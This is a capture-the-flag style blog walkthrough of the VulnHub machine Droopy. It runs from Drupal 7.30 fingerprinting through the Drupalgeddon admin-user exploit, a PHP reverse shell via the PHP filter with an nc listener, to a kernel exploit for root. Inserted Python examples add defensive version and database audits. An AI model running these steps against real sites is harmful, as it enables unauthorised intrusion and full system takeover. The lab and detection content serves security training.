Muzec's Cyber Security Blog

Hack. Sleep. Repeat


image

Yet again today we are working on another OSCP-like box, Droopy, on VulnHub. You can grab a copy here: Download Droopy: v0.2

We always start with an nmap scan.

nmap -sC -sV -oA nmap <Target-IP>

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nmap -sC -sV -oA nmap 172.16.139.175        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 10:01 EDT
Nmap scan report for 172.16.139.175
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds

Just a single port, cool, and a robots.txt. Let's check the webpage to see what is running.

image

The CMS is Drupal. Let's check the robots.txt.

image

So I decided to check /CHANGELOG.txt, since it always holds the Drupal version. Let's confirm it.

image

And we have the version, 7.30. Let's do a quick searchsploit on it.

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ searchsploit Drupal 7.30
-------------------------------------------------------------------------------------------------- -----------------------------
 Exploit Title                                                                                    |  Path
-------------------------------------------------------------------------------------------------- -----------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                 | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                  | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                       | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                       | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                          | php/webapps/35150.php
Drupal < 7.34 - Denial of Service                                                                 | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                          | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                       | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution               | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)           | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                  | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                    | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                | php/webapps/46459.py
-------------------------------------------------------------------------------------------------- -----------------------------
Shellcodes: No Results
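From the blue-team side, the two things that made this box easy to fingerprint are the http-generator meta tag plus a reachable /CHANGELOG.txt (which hands out the exact release) and a Drupal 7 version below 7.32, the release that closed the Drupalgeddon SQL injection (SA-CORE-2014-005, CVE-2014-3704). The script below is an added example, not part of the original post: it parses nmap's normal output (the scan above, embedded as a constructed sample), pulls the disallowed paths out of the http-robots.txt script result, reads the version from the first CHANGELOG.txt heading (a constructed sample in the real file's "Drupal <version>, <date>" format), and reports whether the host is still exposed. Function names and the dict layout are my own.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the port section of the nmap output from the scan above.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
"""

# Constructed sample: the first lines of a Drupal 7.30 CHANGELOG.txt (the real
# file starts with a "Drupal <version>, <date>" heading).
CHANGELOG_HEAD = """\
Drupal 7.30, 2014-07-24
-----------------------
- Fixed a regression introduced in Drupal 7.29 ...
"""

# Drupal 7.32 (SA-CORE-2014-005, CVE-2014-3704) is the first 7.x release without
# the Drupalgeddon SQL injection, so any 7.x below it is exposed.
DRUPALGEDDON_FIXED = (7, 32)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE script result header: "|_name: value" or "| name: value"
SCRIPT_RE = re.compile(r"^\|[_ ]([A-Za-z][\w.-]*): ?(.*)$")
CHANGELOG_RE = re.compile(r"^Drupal (\d+)\.(\d+)", re.MULTILINE)


def parse_nmap(text: str) -> List[Dict]:
    """Parse nmap normal-format output into one dict per port; NSE script
    results are kept as lists of lines under their script name."""
    ports: List[Dict] = []
    current: Optional[Dict] = None
    last_script: Optional[str] = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": {},
            }
            ports.append(current)
            last_script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            last_script = m.group(1)
            current["scripts"][last_script] = [m.group(2).strip()]
        elif last_script:
            # continuation line of a multi-line script result
            current["scripts"][last_script].append(line[1:].lstrip("_ ").strip())
    return ports


def robots_paths(port: Dict) -> List[str]:
    """Disallowed paths reported by http-robots.txt (summary line skipped)."""
    lines = port["scripts"].get("http-robots.txt", [])
    return [p for line in lines[1:] for p in line.split()]


def drupal_major(port: Dict) -> Optional[int]:
    """Major Drupal version from the http-generator meta tag, if present."""
    gen = " ".join(port["scripts"].get("http-generator", []))
    m = re.search(r"Drupal (\d+)", gen)
    return int(m.group(1)) if m else None


def drupal_version_from_changelog(text: str) -> Optional[Tuple[int, int]]:
    """Exact Drupal version from the first heading of CHANGELOG.txt."""
    m = CHANGELOG_RE.search(text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def assess(nmap_text: str, changelog_text: str) -> Dict:
    """Combine the scan and the changelog into an exposure summary for one host."""
    findings: Dict = {"drupalgeddon_exposed": False, "changelog_exposed": False,
                      "leaked_paths": [], "version": None}
    for port in parse_nmap(nmap_text):
        if port["state"] != "open" or drupal_major(port) is None:
            continue
        paths = robots_paths(port)
        version = drupal_version_from_changelog(changelog_text)
        findings["leaked_paths"] = paths
        findings["version"] = version
        # A reachable CHANGELOG.txt is a finding on its own: it gives away the exact release.
        findings["changelog_exposed"] = "/CHANGELOG.txt" in paths
        if version and version[0] == 7 and version < DRUPALGEDDON_FIXED:
            findings["drupalgeddon_exposed"] = True
    return findings


if __name__ == "__main__":
    print(assess(NMAP_OUTPUT, CHANGELOG_HEAD))
```

Run against the sample it reports the 15 leaked paths, version (7, 30) and drupalgeddon_exposed True; the fix on the defending side is to update past 7.32 and to block or delete the txt files Drupal ships in the web root, since robots.txt only advertises them.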

And boom, we have some exploits. Let's try the first one, since it adds a new admin user. Sounds cool, right?

python 34992.py -t http://172.16.139.175/ -u muzec -p muzec

image

User created. Let's use it to log in.

image

Ahhhhh, we are in. Awesome, right?? lol. Now let's try to get a reverse shell; first we need to change some settings.

image

Click on Modules, scroll down, tick PHP filter and click Save.

image

Now go back to Modules and click on Permissions next to PHP filter.

image

Scroll down, tick Use the PHP code text format and save the permissions.

image

Now click on Add content.

image

Click on Article.

image

For the title, name it shell, skip the tags and move to the body. We need a PHP reverse shell from pentestmonkey, which you can download here: Download PHP Reverse Shell.

Copy the reverse shell code into the body, making sure to set our local IP address and port, and start an Ncat listener.

image

For Text format, pick PHP code.

image

Click Save. Back at our listener we should have a shell.

image

And boom, we have a shell.
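Everything between enabling PHP filter and saving the article leaves a trace in the Drupal 7 database, which is what an incident responder should be checking on a compromised site: the php module row in system, the "use text format php_code" grants in role_permission, and node bodies stored with body_format = php_code. The audit below is an added example and not part of the original post or of Drupal itself; it builds an in-memory SQLite copy of just the columns it needs (an assumption that mirrors only part of the real Drupal 7 schema) with constructed rows reflecting the state after the steps above, then runs the three checks.

```python
import sqlite3
from typing import Dict

# Assumption: these tables mirror only the columns this audit needs from the
# Drupal 7 `system`, `role`, `role_permission` and `field_data_body` tables,
# not the full schema.
SCHEMA = """
CREATE TABLE system (name TEXT, type TEXT, status INTEGER);
CREATE TABLE role (rid INTEGER, name TEXT);
CREATE TABLE role_permission (rid INTEGER, permission TEXT, module TEXT);
CREATE TABLE field_data_body (entity_type TEXT, entity_id INTEGER,
                              body_value TEXT, body_format TEXT);
"""

# Constructed sample state, as it looks after the steps above: the php module
# switched on, the PHP code text format granted to two roles, and one article
# whose body is stored in that format (placeholder body, not a real payload).
SAMPLE = {
    "system": [("node", "module", 1), ("user", "module", 1), ("php", "module", 1)],
    "role": [(1, "anonymous user"), (2, "authenticated user"), (3, "administrator")],
    "role_permission": [
        (2, "access content", "node"),
        (3, "administer modules", "system"),
        (2, "use text format php_code", "filter"),
        (3, "use text format php_code", "filter"),
    ],
    "field_data_body": [
        ("node", 1, "Welcome page text", "filtered_html"),
        ("node", 2, "<?php /* constructed placeholder */ ?>", "php_code"),
    ],
}


def build_sample_db() -> sqlite3.Connection:
    """Create the in-memory database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO system VALUES (?, ?, ?)", SAMPLE["system"])
    conn.executemany("INSERT INTO role VALUES (?, ?)", SAMPLE["role"])
    conn.executemany("INSERT INTO role_permission VALUES (?, ?, ?)", SAMPLE["role_permission"])
    conn.executemany("INSERT INTO field_data_body VALUES (?, ?, ?, ?)", SAMPLE["field_data_body"])
    conn.commit()
    return conn


def audit_php_filter(conn: sqlite3.Connection) -> Dict:
    """Report whether the PHP filter module is enabled, which roles may use the
    php_code text format, and which nodes already carry a PHP body."""
    row = conn.execute(
        "SELECT status FROM system WHERE type = 'module' AND name = 'php'"
    ).fetchone()
    roles = [r[0] for r in conn.execute(
        "SELECT role.name FROM role_permission "
        "JOIN role ON role.rid = role_permission.rid "
        "WHERE permission = 'use text format php_code' ORDER BY role.rid")]
    nodes = [r[0] for r in conn.execute(
        "SELECT entity_id FROM field_data_body "
        "WHERE entity_type = 'node' AND body_format = 'php_code' ORDER BY entity_id")]
    return {
        "php_filter_enabled": bool(row and row[0]),
        "roles_with_php_code": roles,
        "php_code_nodes": nodes,
        # Any one of the three is worth an alert on a site that never meant to run PHP from content.
        "suspicious": bool(row and row[0]) or bool(roles) or bool(nodes),
    }


if __name__ == "__main__":
    print(audit_php_filter(build_sample_db()))
```

On the sample this returns php_filter_enabled True, the two roles, node 2 and suspicious True. On a live site the same three queries run against the real database; a site that has no business running PHP from content should have the php module disabled, no php_code grants and no php_code bodies, and each of those is a cheap scheduled check.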

image

Now let's spawn a TTY shell.

┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/droppy]
└─$ nc -nvlp 5555                       
listening on [any] 5555 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.4] 55347
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 18:37:44 up 40 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@droopy:/$ 

Checking the home directory, I found a user but nothing interesting about it.

www-data@droopy:/home/gsuser$ ls
ls
drupal
www-data@droopy:/home/gsuser$ ls -la
ls -la
total 32
drwxr-xr-x 4 gsuser gsuser 4096 Apr 10  2016 .
drwxr-xr-x 3 root   root   4096 Dec 11  2014 ..
-rw-r--r-- 1 gsuser gsuser  220 Dec 11  2014 .bash_logout
-rw-r--r-- 1 gsuser gsuser 3637 Dec 11  2014 .bashrc
drwx------ 2 gsuser gsuser 4096 Dec 11  2014 .cache
-rw-r--r-- 1 gsuser gsuser  675 Dec 11  2014 .profile
-rw------- 1 root   root   1463 Dec 11  2014 .viminfo
drwxrwxr-x 2 gsuser gsuser 4096 Apr 11  2016 drupal
www-data@droopy:/home/gsuser$ 

Privilege Escalation

Looking around I found credentials for MySQL, but nothing interesting in the databases, so I decided to check the kernel version.

image

uname -a

image

A quick Google search and we found our exploit. Not sure it will work, but let's give it a try.

image

Now let's transfer it to the target with SimpleHTTPServer and wget.

image

Now let's compile the exploit.

gcc 37292.c -o exploit

Now let's run it.

image

Boom, we are root.

Greeting From Muzec
